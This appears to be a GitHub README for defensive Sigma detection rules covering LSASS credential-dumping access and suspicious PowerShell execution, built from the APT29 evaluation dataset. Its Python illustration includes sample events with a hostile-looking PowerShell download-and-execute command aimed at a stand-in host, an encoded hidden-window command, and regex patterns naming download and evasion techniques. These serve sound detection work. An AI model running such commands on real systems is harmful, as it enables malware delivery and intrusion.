Manishrawat21/Detection-Rules

APT29 Detection Engineering

Production-ready Sigma detection rules developed from analysis of 196,071 Sysmon events in the MITRE ATT&CK Evaluations APT29 dataset.

Overview

This repository contains validated detection rules for adversary behaviors observed during APT29 simulation. Each rule was tested against the actual attack data, converted to Splunk SPL, and validated for false positives.

Analysis published at: Detection Desk

Detection Coverage

| MITRE Technique | Rule Name | Severity | Status |
|---|---|---|---|
| T1003.001 | LSASS Process Access with Full Permissions | High | Tested |
| T1059.001, T1027 | Suspicious PowerShell Execution Patterns | High | Tested |

Rules

Credential Access

LSASS Process Access with Full Permissions

  • Detects: PowerShell or cmd.exe accessing lsass.exe with GrantedAccess 0x1fffff
  • MITRE: T1003.001 (Credential Dumping)
  • Validated Against: APT29 credential dumping at 23:05:16, ProcessID 3852
  • False Positives: Low (security tools, antivirus)

Splunk Query: View SPL

Execution

Suspicious PowerShell Execution Patterns

  • Detects: PowerShell with encoding, Office-spawned PowerShell with evasion or network activity
  • MITRE: T1059.001 (PowerShell), T1027 (Obfuscation), T1566.001 (Phishing)
  • Validated Against: APT29 dataset EventID 1 PowerShell executions
  • False Positives: Medium (legitimate automation, software deployment)

Splunk Query: View SPL
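The two rules above, expressed as plain Python over constructed Sysmon events (Event ID 10 ProcessAccess and Event ID 1 ProcessCreate). This is an added illustration of the detection logic, not the repository's Sigma rules or SPL; the sample events, the regexes for encoding/evasion/network indicators, and the Office parent list are assumptions you would tune during the false-positive review described under Usage.

```python
import json
import re

# Constructed Sysmon events as JSON lines (not taken from the APT29 dataset).
# EventID 10 = ProcessAccess (source opens a handle to target), EventID 1 = ProcessCreate.
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "SourceProcessId": 3852}
{"EventID": 10, "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "SourceProcessId": 2040}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000", "SourceProcessId": 3900}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "ProcessId": 4120}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')", "ProcessId": 4188}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1", "ProcessId": 4201}
"""

LSASS_SOURCES = {"powershell.exe", "cmd.exe"}          # source images the rule cares about
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)   # -enc <base64>
EVASION = re.compile(r"-(nop|noprofile|w\s+hidden|windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
NETWORK = re.compile(r"invoke-webrequest|downloadstring|net\.webclient|\biwr\b|\bcurl\b", re.I)


def basename(path):
    """Image file name only, lower-cased, so the rules do not depend on install path."""
    return path.rsplit("\\", 1)[-1].lower()


def lsass_full_access(ev):
    """T1003.001: PowerShell or cmd.exe opens lsass.exe with 0x1fffff (PROCESS_ALL_ACCESS)."""
    return (ev.get("EventID") == 10
            and basename(ev.get("TargetImage", "")) == "lsass.exe"
            and basename(ev.get("SourceImage", "")) in LSASS_SOURCES
            and ev.get("GrantedAccess", "").lower() == "0x1fffff")


def suspicious_powershell(ev):
    """T1059.001/T1027: encoded command, or Office-spawned PowerShell with evasion flags or network use."""
    if ev.get("EventID") != 1 or basename(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return False
    cmd = ev.get("CommandLine", "")
    office_spawned = basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
    return bool(ENCODED.search(cmd)) or (office_spawned and bool(EVASION.search(cmd) or NETWORK.search(cmd)))


def run_rules(jsonl):
    """Return (rule name, process id) for every event a rule fires on; deployment-time exclusions go here."""
    hits = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        for name, rule in (("lsass_full_access", lsass_full_access), ("suspicious_powershell", suspicious_powershell)):
            if rule(ev):
                hits.append((name, ev.get("ProcessId", ev.get("SourceProcessId"))))
    return hits
```

The Defender access to lsass.exe (second event) and the svchost-launched deployment script (last event) are the benign cases the False Positives bullets describe; neither fires, while the 0x1000 query-only handle shows why the rule keys on the full access mask rather than any access at all.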

Usage

Convert to Splunk

```shell
sigma convert -t splunk -p sysmon https://github.com/Manishrawat21/SOC_Dectection_Rules/blob/main/Suspicious_Powershell_Commands/Detection_Rule.yaml
```

Convert to Elastic

```shell
sigma convert -t elasticsearch -p sysmon https://github.com/Manishrawat21/SOC_Dectection_Rules/blob/main/Suspicious_Powershell_Commands/Detection_Rule.yaml
```

Note that sigma-cli reads rule files from the local filesystem, so download the raw YAML from the link above and pass that path to `sigma convert`; the GitHub blob URL is shown here to identify which rule file is meant.

Test in Your Environment

  1. Deploy to SIEM test environment
  2. Monitor for 7 days
  3. Document false positives
  4. Add exclusions as needed
  5. Promote to production

Validation Methodology

Each rule was tested using:

  • MITRE ATT&CK Evaluations APT29 dataset (196,071 events)
  • Splunk Free Tier with Sysmon logs
  • ProcessID and ProcessGuid correlation
  • Network traffic validation
  • Parent-child process tree analysis

About This Project

I analyzed the complete APT29 attack simulation to understand how advanced persistent threats operate in real environments. The goal was to write detection rules that catch actual adversary behavior, not theoretical attacks.

Analysis series:

Contributing

These rules are shared for the security community. If you:

  • Find false positives in your environment
  • Improve detection logic
  • Add conversions for other SIEMs

Submit a pull request or open an issue.

Author

Manish Rawat

Detection Engineer | Threat Hunter | CompTIA Security+ & CEH Certified

License

MIT License - Use freely, attribution appreciated

SOC_Dectection_Rules

Written some detection rules to catch abnormal activities. These were written after my APT29 detection series; I hope they work for you as they did for me.
